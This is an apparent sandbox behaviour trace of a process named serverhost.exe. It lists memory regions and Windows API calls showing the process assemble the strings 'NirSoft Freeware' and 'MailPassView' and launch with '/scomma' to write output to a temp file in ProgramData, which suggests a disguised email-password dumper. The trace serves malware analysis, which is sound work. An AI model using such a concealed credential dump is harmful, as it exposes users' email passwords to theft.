"F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1832 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1833 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1834 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1835 start_va = 0x400000 end_va = 0x41bfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1836 start_va = 0xc40000 end_va = 0xc5afff entry_point = 0xc41d90 region_type = mapped_file name = "serverhost.exemh.exe" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exeMh.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exemh.exe") Region: id = 1837 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1838 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1839 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1840 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1841 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1853 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1854 start_va = 0x40000 end_va = 0xa6fff entry_point = 0x40000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1855 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 1856 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 1857 start_va = 0x520000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 1858 start_va = 0x6eb50000 end_va = 0x6ebd3fff entry_point = 0x6eb519a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1859 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1860 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1861 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1862 start_va = 0x758a0000 end_va = 0x764e9fff entry_point = 0x75921601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1863 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1864 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1865 start_va = 0x76670000 end_va = 0x766eafff entry_point = 0x76671aee region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 1866 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1867 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1868 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1869 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1870 start_va = 0x76b40000 end_va = 0x76b96fff entry_point = 0x76b59ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1871 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1872 start_va = 0x77140000 end_va = 0x7729bfff entry_point = 0x7718ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1873 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1874 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1875 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1910 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1911 start_va = 0xb0000 end_va = 0xb0fff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 1912 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 1913 start_va = 0x620000 end_va = 0x720fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1914 start_va = 0xc60000 end_va = 0x185ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 1964 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 1965 start_va = 0x420000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 1968 start_va = 0x730000 end_va = 0x9fefff entry_point = 0x730000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1969 start_va = 0x71ec0000 end_va = 0x71eccfff entry_point = 0x71ec0000 region_type = mapped_file name = "pstorec.dll" filename = "\\Windows\\System32\\pstorec.dll" (normalized: "c:\\windows\\system32\\pstorec.dll") Region: id = 1971 start_va = 0x741c0000 end_va = 0x741d3fff entry_point = 0x741c1da9 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Thread: id = 87 os_tid = 0xc54 [0085.561] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0085.561] __set_app_type (_Type=0x2) [0085.561] __p__fmode () returned 0x768231f4 [0085.561] __p__commode () returned 0x768231fc [0085.561] __getmainargs (in: _Argc=0x22fcec, _Argv=0x22fcf0, _Env=0x22fcf4, _DoWildCard=0, _StartInfo=0x22fcf8 | out: _Argc=0x22fcec, _Argv=0x22fcf0, _Env=0x22fcf4) returned 0 [0085.561] _onexit (_Func=0x4123d0) returned 0x4123d0 [0085.561] _onexit (_Func=0x4123e1) returned 0x4123e1 [0085.561] _onexit (_Func=0x4123f2) returned 0x4123f2 [0085.561] _onexit (_Func=0x412433) returned 0x412433 [0085.561] GetStartupInfoA (in: lpStartupInfo=0x22fca0 | out: lpStartupInfo=0x22fca0*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0085.561] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0085.561] LoadLibraryA (lpLibFileName="comctl32.dll") returned 0x6eb50000 [0085.562] GetProcAddress (hModule=0x6eb50000, lpProcName="InitCommonControlsEx") returned 0x6eb56be6 [0085.562] InitCommonControlsEx (picce=0x22f880) returned 1 [0085.684] FreeLibrary (hLibModule=0x6eb50000) returned 1 [0085.684] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x758a0000 [0085.684] GetProcAddress (hModule=0x758a0000, lpProcName="SHGetSpecialFolderPathA") returned 0x75aefb26 [0085.684] _mbscpy (in: param_1=0x3f2af3, param_2=0x413fc4 | out: param_1=0x3f2af3) returned 0x3f2af3 [0085.684] _mbscpy (in: param_1=0x3f2d37, param_2=0x413fc4 | out: param_1=0x3f2d37) returned 0x3f2d37 [0085.684] _mbscpy (in: param_1=0x22f754, param_2=0x414488 | out: param_1=0x22f754) returned 0x22f754 [0085.684] CreateFontIndirectA (lplf=0x22f738) returned 0xd0a0904 [0085.684] strncat (in: _Dest="", _Source="N\x88ø\"", _Count=0x1 | out: _Dest="N") returned="N" [0085.684] strncat (in: _Dest="N", _Source="i\x88ø\"", _Count=0x1 | out: _Dest="Ni") returned="Ni" [0085.684] strncat (in: _Dest="Ni", _Source="r\x88ø\"", _Count=0x1 | out: _Dest="Nir") returned="Nir" [0085.684] strncat (in: _Dest="Nir", _Source="S\x88ø\"", _Count=0x1 | out: _Dest="NirS") returned="NirS" [0085.684] strncat (in: _Dest="NirS", _Source="o\x88ø\"", _Count=0x1 | out: _Dest="NirSo") returned="NirSo" [0085.684] strncat (in: _Dest="NirSo", _Source="f\x88ø\"", _Count=0x1 | out: _Dest="NirSof") returned="NirSof" [0085.684] strncat (in: _Dest="NirSof", _Source="t\x88ø\"", _Count=0x1 | out: _Dest="NirSoft") returned="NirSoft" [0085.684] strncat (in: _Dest="NirSoft", _Source=" \x88ø\"", _Count=0x1 | out: _Dest="NirSoft ") returned="NirSoft " [0085.684] strncat (in: _Dest="NirSoft ", _Source="F\x88ø\"", _Count=0x1 | out: _Dest="NirSoft F") returned="NirSoft F" [0085.684] strncat (in: _Dest="NirSoft F", _Source="r\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Fr") returned="NirSoft Fr" [0085.684] strncat (in: _Dest="NirSoft Fr", _Source="e\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Fre") returned="NirSoft Fre" [0085.684] strncat (in: _Dest="NirSoft Fre", _Source="e\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Free") returned="NirSoft Free" [0085.684] strncat (in: _Dest="NirSoft Free", _Source="w\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freew") returned="NirSoft Freew" [0085.684] strncat (in: _Dest="NirSoft Freew", _Source="a\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freewa") returned="NirSoft Freewa" [0085.684] strncat (in: _Dest="NirSoft Freewa", _Source="r\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freewar") returned="NirSoft Freewar" [0085.684] strncat (in: _Dest="NirSoft Freewar", _Source="e\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware") returned="NirSoft Freeware" [0085.685] strncat (in: _Dest="NirSoft Freeware", _Source=".\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware.") returned="NirSoft Freeware." [0085.685] strncat (in: _Dest="NirSoft Freeware.", _Source=" \x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. ") returned="NirSoft Freeware. " [0085.685] strncat (in: _Dest="NirSoft Freeware. ", _Source=" \x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. ") returned="NirSoft Freeware. " [0085.685] strncat (in: _Dest="NirSoft Freeware. ", _Source="h\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. h") returned="NirSoft Freeware. h" [0085.685] strncat (in: _Dest="NirSoft Freeware. h", _Source="t\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. ht") returned="NirSoft Freeware. ht" [0085.685] strncat (in: _Dest="NirSoft Freeware. ht", _Source="t\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. htt") returned="NirSoft Freeware. htt" [0085.685] strncat (in: _Dest="NirSoft Freeware. htt", _Source="p\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. http") returned="NirSoft Freeware. http" [0085.685] strncat (in: _Dest="NirSoft Freeware. http", _Source=":\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. http:") returned="NirSoft Freeware. http:" [0085.685] strncat (in: _Dest="NirSoft Freeware. http:", _Source="/\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. http:/") returned="NirSoft Freeware. http:/" [0085.685] strncat (in: _Dest="NirSoft Freeware. http:/", _Source="/\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. http://") returned="NirSoft Freeware. http://" [0085.685] strncat (in: _Dest="NirSoft Freeware. http://", _Source="w\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. http://w") returned="NirSoft Freeware. http://w" [0085.685] strncat (in: _Dest="NirSoft Freeware. http://w", _Source="w\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. http://ww") returned="NirSoft Freeware. http://ww" [0085.685] strncat (in: _Dest="NirSoft Freeware. http://ww", _Source="w\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www") returned="NirSoft Freeware. http://www" [0085.685] strncat (in: _Dest="NirSoft Freeware. http://www", _Source=".\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.") returned="NirSoft Freeware. http://www." [0085.685] strncat (in: _Dest="NirSoft Freeware. http://www.", _Source="n\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.n") returned="NirSoft Freeware. http://www.n" [0085.685] strncat (in: _Dest="NirSoft Freeware. http://www.n", _Source="i\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.ni") returned="NirSoft Freeware. http://www.ni" [0085.685] strncat (in: _Dest="NirSoft Freeware. http://www.ni", _Source="r\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nir") returned="NirSoft Freeware. http://www.nir" [0085.685] strncat (in: _Dest="NirSoft Freeware. http://www.nir", _Source="s\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirs") returned="NirSoft Freeware. http://www.nirs" [0085.685] strncat (in: _Dest="NirSoft Freeware. http://www.nirs", _Source="o\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirso") returned="NirSoft Freeware. http://www.nirso" [0085.685] strncat (in: _Dest="NirSoft Freeware. http://www.nirso", _Source="f\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsof") returned="NirSoft Freeware. http://www.nirsof" [0085.685] strncat (in: _Dest="NirSoft Freeware. http://www.nirsof", _Source="t\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft") returned="NirSoft Freeware. http://www.nirsoft" [0085.685] strncat (in: _Dest="NirSoft Freeware. http://www.nirsoft", _Source=".\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.") returned="NirSoft Freeware. http://www.nirsoft." [0085.685] strncat (in: _Dest="NirSoft Freeware. http://www.nirsoft.", _Source="n\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.n") returned="NirSoft Freeware. http://www.nirsoft.n" [0085.685] strncat (in: _Dest="NirSoft Freeware. http://www.nirsoft.n", _Source="e\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.ne") returned="NirSoft Freeware. http://www.nirsoft.ne" [0085.685] strncat (in: _Dest="NirSoft Freeware. http://www.nirsoft.ne", _Source="t\x88ø\"", _Count=0x1 | out: _Dest="NirSoft Freeware. http://www.nirsoft.net") returned="NirSoft Freeware. http://www.nirsoft.net" [0085.685] LoadIconA (hInstance=0x400000, lpIconName=0x65) returned 0xf0175 [0085.686] strncat (in: _Dest="", _Source="M\x88ø\"", _Count=0x1 | out: _Dest="M") returned="M" [0085.686] strncat (in: _Dest="M", _Source="a\x88ø\"", _Count=0x1 | out: _Dest="Ma") returned="Ma" [0085.686] strncat (in: _Dest="Ma", _Source="i\x88ø\"", _Count=0x1 | out: _Dest="Mai") returned="Mai" [0085.686] strncat (in: _Dest="Mai", _Source="l\x88ø\"", _Count=0x1 | out: _Dest="Mail") returned="Mail" [0085.686] strncat (in: _Dest="Mail", _Source="P\x88ø\"", _Count=0x1 | out: _Dest="MailP") returned="MailP" [0085.686] strncat (in: _Dest="MailP", _Source="a\x88ø\"", _Count=0x1 | out: _Dest="MailPa") returned="MailPa" [0085.686] strncat (in: _Dest="MailPa", _Source="s\x88ø\"", _Count=0x1 | out: _Dest="MailPas") returned="MailPas" [0085.686] strncat (in: _Dest="MailPas", _Source="s\x88ø\"", _Count=0x1 | out: _Dest="MailPass") returned="MailPass" [0085.686] strncat (in: _Dest="MailPass", _Source="V\x88ø\"", _Count=0x1 | out: _Dest="MailPassV") returned="MailPassV" [0085.686] strncat (in: _Dest="MailPassV", _Source="i\x88ø\"", _Count=0x1 | out: _Dest="MailPassVi") returned="MailPassVi" [0085.686] strncat (in: _Dest="MailPassVi", _Source="e\x88ø\"", _Count=0x1 | out: _Dest="MailPassVie") returned="MailPassVie" [0085.686] strncat (in: _Dest="MailPassVie", _Source="w\x88ø\"", _Count=0x1 | out: _Dest="MailPassView") returned="MailPassView" [0085.686] _mbscpy (in: param_1=0x22f8f4, param_2=0x22f784 | out: param_1=0x22f8f4) returned 0x22f8f4 [0085.686] strlen (_Str="/scomma") returned 0x7 [0085.686] strlen (_Str="C:\\ProgramData\\C570.tmp") returned 0x17 [0085.686] _strcmpi (_Str1="/savelangfile", _Str2="/scomma") returned -1 [0085.686] _strcmpi (_Str1="/savelangfile", _Str2="C:\\ProgramData\\C570.tmp") returned -1 [0085.686] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x22f780, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe")) returned 0x47 [0085.686] _mbscat (in: param_1=0x22f780, param_2=0x4141e4 | out: param_1=0x22f780) returned 0x22f780 [0085.686] GetFileAttributesA (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost_lng.ini" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost_lng.ini")) returned 0xffffffff [0085.686] _strcmpi (_Str1="/deleteregkey", _Str2="/scomma") returned -1 [0085.686] _strcmpi (_Str1="/deleteregkey", _Str2="C:\\ProgramData\\C570.tmp") returned -1 [0085.686] EnumResourceTypesA (hModule=0x400000, lpEnumFunc=0x40f402, lParam=0x0) returned 1 [0085.687] EnumResourceNamesA (hModule=0x400000, lpType=0x1, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0085.687] FindResourceA (hModule=0x400000, lpName=0x1, lpType=0x1) returned 0x4194d8 [0085.687] SizeofResource (hModule=0x400000, hResInfo=0x4194d8) returned 0x134 [0085.687] LoadResource (hModule=0x400000, hResInfo=0x4194d8) returned 0x4196b8 [0085.687] LockResource (hResData=0x4196b8) returned 0x4196b8 [0085.687] EnumResourceNamesA (hModule=0x400000, lpType=0x2, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0085.687] FindResourceA (hModule=0x400000, lpName=0x68, lpType=0x2) returned 0x4194e8 [0085.687] SizeofResource (hModule=0x400000, hResInfo=0x4194e8) returned 0x3e8 [0085.687] LoadResource (hModule=0x400000, hResInfo=0x4194e8) returned 0x4197ec [0085.687] LockResource (hResData=0x4197ec) returned 0x4197ec [0085.687] FindResourceA (hModule=0x400000, lpName=0x85, lpType=0x2) returned 0x4194f8 [0085.687] SizeofResource (hModule=0x400000, hResInfo=0x4194f8) returned 0xd8 [0085.687] LoadResource (hModule=0x400000, hResInfo=0x4194f8) returned 0x419bd4 [0085.687] LockResource (hResData=0x419bd4) returned 0x419bd4 [0085.687] FindResourceA (hModule=0x400000, lpName=0x86, lpType=0x2) returned 0x419508 [0085.687] SizeofResource (hModule=0x400000, hResInfo=0x419508) returned 0xd8 [0085.687] LoadResource (hModule=0x400000, hResInfo=0x419508) returned 0x419cac [0085.687] LockResource (hResData=0x419cac) returned 0x419cac [0085.687] EnumResourceNamesA (hModule=0x400000, lpType=0x3, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0085.687] FindResourceA (hModule=0x400000, lpName=0x2, lpType=0x3) returned 0x419518 [0085.687] SizeofResource (hModule=0x400000, hResInfo=0x419518) returned 0x2e8 [0085.687] LoadResource (hModule=0x400000, hResInfo=0x419518) returned 0x419d84 [0085.687] LockResource (hResData=0x419d84) returned 0x419d84 [0085.687] FindResourceA (hModule=0x400000, lpName=0x3, lpType=0x3) returned 0x419528 [0085.687] SizeofResource (hModule=0x400000, hResInfo=0x419528) returned 0x128 [0085.687] LoadResource (hModule=0x400000, hResInfo=0x419528) returned 0x41a06c [0085.687] LockResource (hResData=0x41a06c) returned 0x41a06c [0085.687] FindResourceA (hModule=0x400000, lpName=0x4, lpType=0x3) returned 0x419538 [0085.687] SizeofResource (hModule=0x400000, hResInfo=0x419538) returned 0x128 [0085.687] LoadResource (hModule=0x400000, hResInfo=0x419538) returned 0x41a194 [0085.687] LockResource (hResData=0x41a194) returned 0x41a194 [0085.687] EnumResourceNamesA (hModule=0x400000, lpType=0x4, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0085.688] FindResourceA (hModule=0x400000, lpName=0x66, lpType=0x4) returned 0x419548 [0085.688] SizeofResource (hModule=0x400000, hResInfo=0x419548) returned 0x38c [0085.688] LoadResource (hModule=0x400000, hResInfo=0x419548) returned 0x41a2bc [0085.688] LockResource (hResData=0x41a2bc) returned 0x41a2bc [0085.688] FindResourceA (hModule=0x400000, lpName=0x68, lpType=0x4) returned 0x419558 [0085.688] SizeofResource (hModule=0x400000, hResInfo=0x419558) returned 0x1f2 [0085.688] LoadResource (hModule=0x400000, hResInfo=0x419558) returned 0x41a648 [0085.688] LockResource (hResData=0x41a648) returned 0x41a648 [0085.688] EnumResourceNamesA (hModule=0x400000, lpType=0x5, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0085.688] FindResourceA (hModule=0x400000, lpName=0x69, lpType=0x5) returned 0x419568 [0085.688] SizeofResource (hModule=0x400000, hResInfo=0x419568) returned 0xa2 [0085.688] LoadResource (hModule=0x400000, hResInfo=0x419568) returned 0x41a83c [0085.688] LockResource (hResData=0x41a83c) returned 0x41a83c [0085.688] FindResourceA (hModule=0x400000, lpName=0x6b, lpType=0x5) returned 0x419578 [0085.688] SizeofResource (hModule=0x400000, hResInfo=0x419578) returned 0x296 [0085.688] LoadResource (hModule=0x400000, hResInfo=0x419578) returned 0x41a8e0 [0085.688] LockResource (hResData=0x41a8e0) returned 0x41a8e0 [0085.688] FindResourceA (hModule=0x400000, lpName=0x6c, lpType=0x5) returned 0x419588 [0085.688] SizeofResource (hModule=0x400000, hResInfo=0x419588) returned 0x364 [0085.688] LoadResource (hModule=0x400000, hResInfo=0x419588) returned 0x41ab78 [0085.688] LockResource (hResData=0x41ab78) returned 0x41ab78 [0085.688] FindResourceA (hModule=0x400000, lpName=0x70, lpType=0x5) returned 0x419598 [0085.688] SizeofResource (hModule=0x400000, hResInfo=0x419598) returned 0xfa [0085.688] LoadResource (hModule=0x400000, hResInfo=0x419598) returned 0x41aedc [0085.688] LockResource (hResData=0x41aedc) returned 0x41aedc [0085.688] FindResourceA (hModule=0x400000, lpName=0x448, lpType=0x5) returned 0x4195a8 [0085.688] SizeofResource (hModule=0x400000, hResInfo=0x4195a8) returned 0x336 [0085.688] LoadResource (hModule=0x400000, hResInfo=0x4195a8) returned 0x41afd8 [0085.688] LockResource (hResData=0x41afd8) returned 0x41afd8 [0085.688] EnumResourceNamesA (hModule=0x400000, lpType=0x6, lpEnumFunc=0x40f37c, lParam=0x0) returned 1 [0085.688] FindResourceA (hModule=0x400000, lpName=0x1, lpType=0x6) returned 0x4195b8 [0085.688] SizeofResource (hModule=0x400000, hResInfo=0x4195b8) returned 0x1f2 [0085.688] LoadResource (hModule=0x400000, hResInfo=0x4195b8) returned 0x41b310 [0085.688] LockResource (hResData=0x41b310) returned 0x41b310 [0085.688] FindResourceA (hModule=0x400000, lpName=0x2, lpType=0x6) returned 0x4195c8 [0085.688] SizeofResource (hModule=0x400000, hResInfo=0x4195c8) returned 0x24 [0085.688] LoadResource (hModule=0x400000, hResInfo=0x4195c8) returned 0x41b504 [0085.688] LockResource (hResData=0x41b504) returned 0x41b504 [0085.689] FindResourceA (hModule=0x400000, lpName=0x20, lpType=0x6) returned 0x4195d8 [0085.689] SizeofResource (hModule=0x400000, hResInfo=0x4195d8) returned 0x13a [0085.689] LoadResource (hModule=0x400000, hResInfo=0x4195d8) returned 0x41b528 [0085.689] LockResource (hResData=0x41b528) returned 0x41b528 [0085.689] FindResourceA (hModule=0x400000, lpName=0x21, lpType=0x6) returned 0x4195e8 [0085.689] SizeofResource (hModule=0x400000, hResInfo=0x4195e8) returned 0x3e [0085.689] LoadResource (hModule=0x400000, hResInfo=0x4195e8) returned 0x41b664 [0085.689] LockResource (hResData=0x41b664) returned 0x41b664 [0085.689] FindResourceA (hModule=0x400000, lpName=0x33, lpType=0x6) returned 0x4195f8 [0085.689] SizeofResource (hModule=0x400000, hResInfo=0x4195f8) returned 0x48 [0085.689] LoadResource (hModule=0x400000, hResInfo=0x4195f8) returned 0x41b6a4 [0085.689] LockResource (hResData=0x41b6a4) returned 0x41b6a4 [0085.689] FindResourceA (hModule=0x400000, lpName=0x39, lpType=0x6) returned 0x419608 [0085.689] SizeofResource (hModule=0x400000, hResInfo=0x419608) returned 0x134 [0085.689] LoadResource (hModule=0x400000, hResInfo=0x419608) returned 0x41b6ec [0085.689] LockResource (hResData=0x41b6ec) returned 0x41b6ec [0085.689] FindResourceA (hModule=0x400000, lpName=0x3a, lpType=0x6) returned 0x419618 [0085.689] SizeofResource (hModule=0x400000, hResInfo=0x419618) returned 0xa6 [0085.689] LoadResource (hModule=0x400000, hResInfo=0x419618) returned 0x41b820 [0085.689] LockResource (hResData=0x41b820) returned 0x41b820 [0085.689] FindResourceA (hModule=0x400000, lpName=0x3f, lpType=0x6) returned 0x419628 [0085.689] SizeofResource (hModule=0x400000, hResInfo=0x419628) returned 0x74 [0085.689] LoadResource (hModule=0x400000, hResInfo=0x419628) returned 0x41b8c8 [0085.689] LockResource (hResData=0x41b8c8) returned 0x41b8c8 [0085.689] FindResourceA (hModule=0x400000, lpName=0x40, lpType=0x6) returned 0x419638 [0085.689] SizeofResource (hModule=0x400000, hResInfo=0x419638) returned 0xaa [0085.689] LoadResource (hModule=0x400000, hResInfo=0x419638) returned 0x41b93c [0085.689] LockResource (hResData=0x41b93c) returned 0x41b93c [0085.689] FindResourceA (hModule=0x400000, lpName=0x52, lpType=0x6) returned 0x419648 [0085.689] SizeofResource (hModule=0x400000, hResInfo=0x419648) returned 0x68 [0085.689] LoadResource (hModule=0x400000, hResInfo=0x419648) returned 0x41b9e8 [0085.689] LockResource (hResData=0x41b9e8) returned 0x41b9e8 